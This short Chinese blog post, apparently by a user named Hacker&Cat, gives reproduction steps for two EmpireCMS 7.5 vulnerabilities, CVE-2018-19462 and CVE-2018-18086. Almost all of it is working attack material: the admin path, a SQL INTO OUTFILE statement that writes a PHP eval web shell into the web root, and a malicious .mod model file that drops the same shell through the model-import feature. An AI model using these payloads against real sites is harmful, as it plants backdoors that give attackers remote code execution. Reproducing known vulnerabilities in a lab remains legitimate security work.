帝国CMS

1.漏洞复现

cve_2018_19462

影响范围:EmpireCMS <= 7.5

登录后台,路径:/e/admin/index.php

系统->备份与恢复数据->执行SQL语句

mysql.ini配置secure_file_priv=时可以写入PHP一句话木马

select '<?php @eval($_POST[1]);?>' into outfile 'D:/environment/phpstudy/PHPTutorial/WWW/shell.php';

cve_2018_18086 文件上传

影响范围:EmpireCMS <= 7.5

新建shell.php.mod

<?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>

登录后台,路径:/e/admin/index.php

系统->数据表与系统模型->管理数据表->导入系统模型->表名随意、文件选择shell.php.mod

PHP一句话木马路径:/e/admin/shell.php

posted @ 2023-01-16 20:18  Hacker&Cat  阅读(58)  评论(0编辑  收藏  举报